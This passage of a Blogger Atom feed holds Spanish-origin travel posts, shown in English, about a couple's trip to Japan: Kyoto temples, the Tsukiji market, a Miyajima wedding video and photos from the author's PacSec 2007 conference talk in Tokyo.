src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_aUReV5sSeqk/R17E0m0DAaI/AAAAAAAACqo/3RLbFGsbUA8/s72-c/2094364077_7acc9f0d1c_b.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6919351378316058382</id><published>2007-12-11T06:18:00.000-08:00</published><updated>2007-12-11T06:22:12.421-08:00</updated><title type='text'>Rock and Roll, damn it!</title><content type='html'>What you can see in the video is a small fragment of a Buddhist ceremony at the Daisho-In temple. &lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/h-NmxktUQLw&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/h-NmxktUQLw&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Enjoy&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6919351378316058382?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6919351378316058382/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6919351378316058382' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6919351378316058382'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6919351378316058382'/><link rel='alternate' type='text/html' 
href='http://eticanicomana.blogspot.com/2007/12/rock-and-roll-carajo.html' title='Rock and Roll carajo!'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3569711782795927258</id><published>2007-12-11T05:48:00.000-08:00</published><updated>2007-12-11T05:54:07.962-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tradicional'/><category scheme='http://www.blogger.com/atom/ns#' term='miyajima'/><category scheme='http://www.blogger.com/atom/ns#' term='japanese'/><category scheme='http://www.blogger.com/atom/ns#' term='wedding'/><category scheme='http://www.blogger.com/atom/ns#' term='japones'/><category scheme='http://www.blogger.com/atom/ns#' term='casamiento'/><category scheme='http://www.blogger.com/atom/ns#' term='traditional'/><title type='text'>Wedding Ceremony in Japan</title><content type='html'>Almost by chance, while touring the Itsukushima temple, the main temple of the island of Miyajima, a few kilometres from Hiroshima, we were lucky enough to witness a traditional Japanese wedding; here is the video (the flute sounds out of tune, blame the camera's rudimentary microphone)&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/L9zqd-Fk2Q0&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/L9zqd-Fk2Q0&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 
src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3569711782795927258?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3569711782795927258/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3569711782795927258' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3569711782795927258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3569711782795927258'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/ceremonia-de-casamiento-en-japon.html' title='Ceremonia de Casamiento en Japon'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2073425947539061798</id><published>2007-12-11T03:45:00.000-08:00</published><updated>2007-12-11T04:10:40.646-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tokyo'/><category scheme='http://www.blogger.com/atom/ns#' term='pacsec'/><category scheme='http://www.blogger.com/atom/ns#' term='japon'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='presentacion'/><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><category scheme='http://www.blogger.com/atom/ns#' term='japan'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>Looking sharp, dad!</title><content type='html'>In the 
context of PacSec 2007, in Tokyo, Japan.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-173.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-173.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:courier new;"&gt;Dragos announcing my talk, before starting&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-174.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-174.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:courier new;"&gt;First slide, translated into Japanese (nice, isn't it?)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-177.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-177.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:courier new;"&gt;Let me remind you that it was the last talk of the last day, so it was inevitable to add some humour to keep an exhausted audience going.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 
href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-176.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-176.jpg" alt="" border="0" /&gt;&lt;/a&gt; &lt;span style="font-family:courier new;"&gt;In the heat of battle&lt;/span&gt; &lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-178.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-178.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-family:courier new;"&gt;A long story&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-179.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://sid.rstack.org/gallery/galleries/200711_Tokyo/mq/img-179.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-family:courier new;"&gt;Questions?&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The presentation went moderately well, with some technical problems at the start. 
On my notebook I could not see the slides, which did not help the nerves much, but once you are down in the mud on the pitch, you calm down and let out everything you know.&lt;br /&gt;&lt;br /&gt;Another major problem (which we hope Dragos and the organisers find a way to change in the future) is that the presentations translated into Spanish are on another notebook, so one, facing the audience, has to keep pressing 'next' on both computers. Triple challenge: presenting the information correctly, brain-finger coordination, and using correct English.&lt;br /&gt;&lt;br /&gt;But everything went well, I got a few smiles (one of the hardest objectives in front of a Japanese audience) and had the odd question.&lt;br /&gt;&lt;br /&gt;Thanks to Cedric Blancer (&lt;a href="http://sid.rstack.org/"&gt;http://sid.rstack.org&lt;/a&gt;) for the photographic material.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2073425947539061798?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2073425947539061798/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2073425947539061798' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2073425947539061798'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2073425947539061798'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/que-pinta-papa.html' title='Que pinta papa!'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6603931475724582550</id><published>2007-12-03T14:06:00.001-08:00</published><updated>2007-12-03T14:13:15.478-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='temples'/><category scheme='http://www.blogger.com/atom/ns#' term='kyoto'/><category scheme='http://www.blogger.com/atom/ns#' term='templos'/><category scheme='http://www.blogger.com/atom/ns#' term='japan'/><title type='text'>Nipponese Chronicles - Chapter 9 - "Hitler was very Zen"</title><content type='html'>Dear readers,&lt;br /&gt;  After a long interval of silence, we return to the ring with our travelers' chronicles through the interior of Japan.&lt;br /&gt;  This time, from the beautiful city of Kyoto, known for its great number of temples and for being the former capital of Japan. Its beauty was the consideration for which the United States chose not to drop the bomb there in the Second World War.&lt;br /&gt;  Kyoto is located in a valley surrounded by 3 mountains: Higashiyama, Kitayama and Nishiyama.&lt;br /&gt;&lt;br /&gt;  If at any point it occurred to our readers that the Tokyo train system was complicated, it is because they have not yet read, in our chronicles, about the Kyoto bus system. Although it is a small city, with approximately 1.5 million people (and they all visit the temples together on weekends), it has around 29 bus lines covering the whole city. Traveling by bus is a peculiar experience: you enter through the rear door and exit through the front, you always pay at the end of the trip, the driver does not shout, he wears gloves and uses a microphone to announce the stops (apart from the screens). 
What cannot be avoided is traveling sardine-style, a worldwide characteristic of city buses; the only difference is that the Japanese break the record for people per square centimeter (as Buddha said, "Where 1 fits, 20 fit").&lt;br /&gt;&lt;br /&gt; For reasons of time (we are already leaving for Hiroshima), I will not describe the temples, but I do leave you some photos to enjoy. Look closely at the variety of colors, from yellow to bordeaux, in the foliage of the cherry trees, which is especially beautiful.&lt;br /&gt;&lt;a href="http://picasaweb.google.com/nicowow/02122007"&gt;http://picasaweb.google.com/nicowow/02122007&lt;/a&gt;&lt;br /&gt;&lt;br /&gt; For those who were worried about the matter (possibly only Cari and Nico), we were finally able to buy a suitable suitcase (note that all the basic suitcases we had found up to that point were around 1500 usd; yes, Japan is expensive, especially the shopping malls). But we are on our way, with the new suitcase, the small suitcase, and the old one, which we carry on our shoulder.&lt;br /&gt; &lt;br /&gt; More news from Hiroshima!&lt;br /&gt;&lt;br /&gt;See you soon&lt;br /&gt;&lt;br /&gt;Cari &amp; Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6603931475724582550?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6603931475724582550/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6603931475724582550' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6603931475724582550'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6603931475724582550'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/hitler-era-muy-zen.html' title='Cronicas Nipponas - 9to Capitulo - &quot;Hitler era muy Zen&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6690196065720517017</id><published>2007-12-01T11:55:00.001-08:00</published><updated>2007-12-01T11:55:21.147-08:00</updated><title type='text'>Nipponese Chronicles - Chapter 8 - "Reinforcing the wheels"</title><content type='html'>Welcome back, everyone, to this humble traveler's diary,&lt;br /&gt;&lt;br /&gt;When traveling to Japan, it is very important to keep in mind two or three facts that, no matter how hard you try, you will not be able to escape.&lt;br /&gt; In Japan you walk. No matter how many yen you have in your pocket, you will have to move around inside the subways, trains, the airport, the streets, a temple; therefore, it is always advisable to travel as light as possible in hand luggage, and as for the large luggage, well, try to find the best possible suitcase in terms of size and durability.&lt;br /&gt; &lt;br /&gt;  That was the case for these travelers, who specifically bought a suitcase of the largest size (knowing it would fill up with some gadgets) and with 4 wheels to make moving it easier (even though hotels close to the subway stations were carefully booked). 
But all that was in vain, since on just the first leg, from the Tokyo hotel to Shibuya, the big suitcase lost its first wheel.&lt;br /&gt;  But that did not defeat these adventurers, and with a bit of Argentine creativity they managed to reach the station on 3 wheels. From Shibuya they took the subway to Tokyo station, and there the famous Shinkansen (Bullet Train).&lt;br /&gt;  The Japanese Bullet Train is a showcase of this country's high technology. It covers around 2000 kilometers (or more) from the far north to the south. In our case, we took the Shinkansen Hikari, which starts in Tokyo and is bound for Kyoto, making some intermediate stops such as Nagoya, etc., and among the landscapes it passes are the famous Mount Fuji and the Ark Theatre Sanyo stadium (which has the largest number of solar panels in the world). Let me remind you that, like everything in Japan, it runs with kilometric precision, and it departed and arrived on time.&lt;br /&gt;&lt;br /&gt;  Having arrived in Kyoto, all that remained was to walk about two blocks (according to the little map our hotel provided), which turned into around 8 given the length of the streets. And on that stretch, as was to be expected, the second wheel was lost. From then on it was all pain and calluses until we finally reached the Kyoto Tokyu Hotel.&lt;br /&gt;  A beautiful hotel in the north of Tokyo, from which we are writing these chronicles at this very moment.&lt;br /&gt;&lt;br /&gt;  Next to the hotel, and extensively toured by yours truly, is the Nishi-Hongaji temple ("Western Hongaji"). This temple is the head of the Hongaji branch of the Jodo-Shinshu Buddhist sect (note that 'sect' does not carry the pejorative sense it has in Argentina; it is simply a religion), with millions of followers around the world. 
(Although none of them had a spare wheel to lend us.)&lt;br /&gt;  This temple was built in 1591 by Toyotomi Hideoshi (a rather combative general of that era) after another temple of similar characteristics was destroyed in Osaka by his enemy Oda Nobunaga. This beautiful temple was designated a "World Heritage" site by UNESCO.&lt;br /&gt;&lt;br /&gt;  For those thirsty for photographs, here you can see some:&lt;br /&gt;&lt;br /&gt;http://picasaweb.google.com/nicowow/01122007Kyoto1stDay&lt;br /&gt;&lt;br /&gt;See you soon&lt;br /&gt;Cari &amp; Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6690196065720517017?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6690196065720517017/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6690196065720517017' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6690196065720517017'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6690196065720517017'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/12/cronicas-nipponas-8to-capitulo.html' title='Cronicas Nipponas - 8to Capitulo - &quot;Reforzando las ruedas&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2982716893073447392</id><published>2007-11-30T15:07:00.001-08:00</published><updated>2007-11-30T15:07:36.549-08:00</updated><title type='text'>Nipponese Chronicles - Chapter 7 - "Recapping Restaurants"</title><content type='html'>Dear readers,&lt;br /&gt;  Here we are again, on the eve of the trip to Kyoto, on one of the many beautiful cloudy mornings the empire of the rising sun offers us.&lt;br /&gt;  In this edition, thanks to new technical elements, we were able to upload the photographic material from the camera we will call "Camera C" (that is, the camera Cari always carries).&lt;br /&gt;&lt;br /&gt;  Already familiar with the delicacies the frequent air traveler is presented with (salads with a dressing of strange provenance, reheated pasta, dry chicken with overboiled vegetables, etc.), the flight from Washington to Tokyo surprised us with a midday menu consisting of assorted vegetables with ginger chicken, rice, an assortment of cheeses and radishes in vinaigrette, and some interesting cold noodles.&lt;br /&gt;  http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740634177427634&lt;br /&gt;&lt;br /&gt;  As was described in detail in the first chapter of this adventure, the first Argentine-Japanese encounter took place at a 'yakiniku' (Japanese-style barbecue) place; here you can see the photographic document that proves it:&lt;br /&gt;   http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740664242198786&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  Other delicacies this team had the luck to savor were different varieties of Niguiri (rice with a rectangular strip of raw/cooked fish on top).&lt;br /&gt;   
http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740711486839138&lt;br /&gt;   http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138740715781806450&lt;br /&gt;  We will not describe each one precisely, but among them were all kinds of salmon and tuna, salmon roe, assorted eels, and a niguiri unknown to us, which consisted of monkfish liver (that is, a sort of Japanese Foie Gras).&lt;br /&gt;  Also, within the range of sushi, we visited the restaurant that had the automatic conveyor belt carrying plates:&lt;br /&gt;   http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138741647789709746&lt;br /&gt;&lt;br /&gt;  For those interested in seeing the innards of the Bank Of Japan and the XBRML working team (including our economics specialist), you only have to click the following link:&lt;br /&gt;  http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138741673559513586&lt;br /&gt;&lt;br /&gt;  Finally, we leave you two photos of the conference (we promise more): in the first you can see a group of Frenchmen who came to present on various topics, and in the second "Kostya", a coworker of Nico's, also French, offering free hugs.&lt;br /&gt;  http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138743425906170786&lt;br /&gt;  http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007/photo#5138743430201138098&lt;br /&gt;&lt;br /&gt;Until next time!&lt;br /&gt;Cari &amp; Nico&lt;br /&gt;PS: If you want to see more photos, go to: http://picasaweb.google.com/nicowow/CamaraCariFrom2629November2007&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-2982716893073447392?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' 
type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2982716893073447392/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2982716893073447392' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2982716893073447392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2982716893073447392'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/cronicas-nipponas-7to-capitulo.html' title='Cronicas Nipponas - 7to Capitulo - &quot;Recapitulando Restaurantes&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-285367731111306558</id><published>2007-11-30T12:52:00.000-08:00</published><updated>2007-11-30T12:53:12.736-08:00</updated><title type='text'>FREE HUGS</title><content type='html'>On offer&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/1wXxdVKVWWo&amp;rel=1"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/1wXxdVKVWWo&amp;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-285367731111306558?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 
href='http://eticanicomana.blogspot.com/feeds/285367731111306558/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=285367731111306558' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/285367731111306558'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/285367731111306558'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/free-hugs.html' title='FREE HUGS'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-398499754651353982</id><published>2007-11-29T09:58:00.001-08:00</published><updated>2007-11-29T09:58:14.100-08:00</updated><title type='text'>Nipponese Chronicles - Chapter 5 - "In search of raw fish"</title><content type='html'>As the days go by, the members of the expedition slowly improve their abilities to understand, communicate and get around. On this occasion, and on account of post-jet-lag insomnia, the team set out at 5 am for the famous Tsukiji fish market. To do so, they took the JR (Japanese Rail) Yamamote Line toward Omotesando and got off at Ebisu station. 
There, they transferred to the Hibiya Line so that, after 10 stations and 20 minutes, they arrived at Tsukiji station.&lt;br /&gt;-------------------&lt;br /&gt;5am face: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061495429410082" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061495429410082&lt;/a&gt;&lt;br /&gt;Hibiya Line:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061508314312034" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061508314312034&lt;/a&gt;&lt;br /&gt;Japanese people invaded by advertising inside the subways:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061525494181250" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061525494181250&lt;/a&gt;&lt;br /&gt;-------------------&lt;br /&gt;&lt;br /&gt;The tsukiji market dates from the 16th century, Edo period, when the shogun of Tokyo invited several fishermen to fish near the castle to supply the castle with food. Today, the market handles around 2882 tons of fish per day (yesterday it was 2882 minus half a kilo, which was the sushi Cari and Nico tasted with the sole aim of complicating the statistics).&lt;br /&gt;One of the most impressive characteristics of this market, however implausible it may sound, is that it has absolutely no fish smell. 
Although, for example, if you pass a dried-fish shop you temporarily notice that specific smell (to orient yourself olfactorily, the smell resembles that of the yellow jars of flakes fed to aquarium fish), at the other stands where raw fish is sold there is absolutely no smell of any kind, which gives it a unique character.&lt;br /&gt;Apart from selling raw fish, there are also all kinds of vegetables, radishes (remember that the Japanese consume a lot of this kind of vegetable), tea, and all sorts of utensils for restaurant kitchens.&lt;br /&gt;-----------------&lt;br /&gt;Odorless fish; try bringing your nose close to the monitor and you will verify it: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061538379083170" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061538379083170 &lt;/a&gt;&lt;br /&gt;Azuky bean seeds: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061559853919714" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061559853919714&lt;/a&gt;&lt;br /&gt;Little jars for soy sauce:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061581328756274" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061581328756274&lt;/a&gt;&lt;br /&gt;Radishes: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061589918690898" target="_blank"&gt; http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061589918690898&lt;/a&gt;&lt;br /&gt;Don't try to be clever with the fishmongers: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061632868364034" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061632868364034 &lt;/a&gt;&lt;br /&gt;Caught: &lt;a 
href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061658638167858" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061658638167858&lt;/a&gt;&lt;br /&gt;As it had to be, we had a few pieces of sushi for breakfast to start the day in style:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138061602803592850" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138061602803592850&lt;/a&gt;&lt;br /&gt;-----------------&lt;br /&gt;After increasing the number of calluses on our feet, the team headed to the Aoyama district (Omotesando station on the Ginza line); this neighborhood is the Japanese version of "Beverly Hills", that is, a neighborhood where it is better to hide your wallet (to understand the "Japanese version" part, multiply by two the price you have in your head).&lt;br /&gt;In this neighborhood, specifically at the Aoyama Diamond Hall Hotel, is where the conference called PacSec takes place, and the secondary reason we are here in Japan.&lt;br /&gt;Allow us to open a parenthesis to tell you that the Training scheduled for November 27 or 28 was cancelled (which allowed the team to see more of Tokyo than expected); in any case, there is still the one-hour talk to be given tomorrow at the end of the day.&lt;br /&gt;-----------------&lt;br /&gt;Conference: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202039644237794" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202039644237794&lt;/a&gt;&lt;br /&gt;Simultaneous translators:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202052529139714" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202052529139714&lt;/a&gt;&lt;br 